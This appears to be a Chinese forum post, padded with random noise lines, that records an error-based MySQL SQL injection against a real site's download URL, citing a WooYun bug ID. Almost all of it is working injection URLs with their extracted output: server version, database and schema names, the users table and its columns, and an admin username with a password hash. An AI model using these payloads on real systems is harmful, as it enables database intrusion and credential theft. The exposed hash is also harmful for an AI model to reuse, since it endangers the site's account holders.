http://www.wooyun.org/bugs/wooyun-2010-01666
7 U& j: |3 Z% \" }# v4 r% Y# a) E! L+ @& n- y8 g) z
之前想找个测试 没想到这有 可以测试下做个记录而已 + ]1 ~' R* p' L! V# i$ T, t4 }
4 w( ?4 h5 W+ {9 Q( k' D
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
, K( v# B: n9 Q# B+ S) o* I5 M, I" w
/ a0 t i* V- I/ @4 B/data0/htdocs/leqi_new/app/myapp.php: T$ c4 b0 }4 O4 |9 N# C
8 J9 U0 ~" d* N; L
或者
% T0 _) ~& z0 E: T, ]" Y, u3 @+ |9 A9 Z# z% L
/**********version()**********/ 5.1.49-log
* |! x# v1 e! |http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003/ X0 t" V. q; s9 L" _! i
" u# Y6 K0 T. j: P: _: Q% i7 C
/**********user()**********/
: P7 u# h9 _ C8 Bhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003) r0 e* X z& x4 R0 O
+ A( X r* S& z: G# T5 B/**********database()**********/ leqi
. H: k! r ]3 s% c# f/ Fhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
5 \" C$ t# q9 h' T# i; Y( M! o& Q/ u- }5 g; j2 B7 `2 ^$ m
/**********limit依次递归爆库**********/- S( L% t' `; y/ q n, z
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0034 W" x! D! J- r/ b) m
information_schema i* Q; ?- S9 j, u! H r
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003% N3 C R7 e, F+ a7 K v9 I
leqi) e" h4 ~$ I& y; n# ~+ m
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
4 I/ A- P6 E+ w. x+ t2 N6 Ktest
?3 G9 w% q: J* @" \5 D
* R6 @1 a; Y+ Y/**********limit依次递归爆表名**********/
) v+ a6 G) ?, J1 ^http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0034 C) M6 Q5 b4 W' Z0 A
users
- ?" _8 x6 ]" _8 G8 p* w
) a7 f& V2 b1 n' T; B2 P/**********limit依次递归爆字段名**********/+ X: }/ L, A8 Y, X! d
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
3 N" ?0 n* ` X& wuser_id,username,nickname,passwd,group_id, s# k/ e. ~5 p' J0 x5 K6 B
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
0 ?' L0 h8 ?) c9 f( Q7 y/wapc/5000_0005_003
% s' X" q" `# @9 }5 B11 21
R( J1 @ C2 y- g* A- ]6 `) w* ~http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
4 M+ r: @9 @) x* @/wapc/5000_0005_003
7 |- T* {% w+ d! d- J8 T11 341 351 361* r& F; X% ~4 N! K3 o2 q
/**********爆数据**********/
8 Z; {: t" w! d+ s: E# Ehttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%231 F# g8 N; j: }; }* u$ b! v% J
admin) B! B* H, A2 i
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23; [! |, I6 d0 Q3 N% d: w
6a8b4574ca231eb8bd52764d4978ffcd3 w' O, ~/ M) E
* m+ h) h9 o3 g- ~; ~( g0 S; _
/ l r, A! M `7 q0 j
|